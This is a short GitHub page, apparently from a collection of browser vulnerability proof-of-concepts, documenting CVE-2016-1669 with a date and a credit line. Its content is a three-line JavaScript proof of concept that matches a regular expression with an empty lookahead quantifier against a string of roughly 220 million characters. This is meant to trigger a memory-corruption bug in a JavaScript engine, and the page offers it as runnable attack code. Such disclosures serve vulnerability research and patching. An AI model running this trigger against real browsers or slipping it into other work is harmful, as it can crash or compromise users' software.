Skip to content

Latest commit

 

History

History
16 lines (11 loc) · 290 Bytes

CVE-2016-1669.md

File metadata and controls

16 lines (11 loc) · 290 Bytes

CVE-2016-1669

  • Date: Apr 2016
  • Credit: Choongwoo Han

PoC

r2 = new RegExp("(?=)*", "g");
s0 = Array(220000700).join('a'); // the size could be different
result = s0.match(r2);

Reference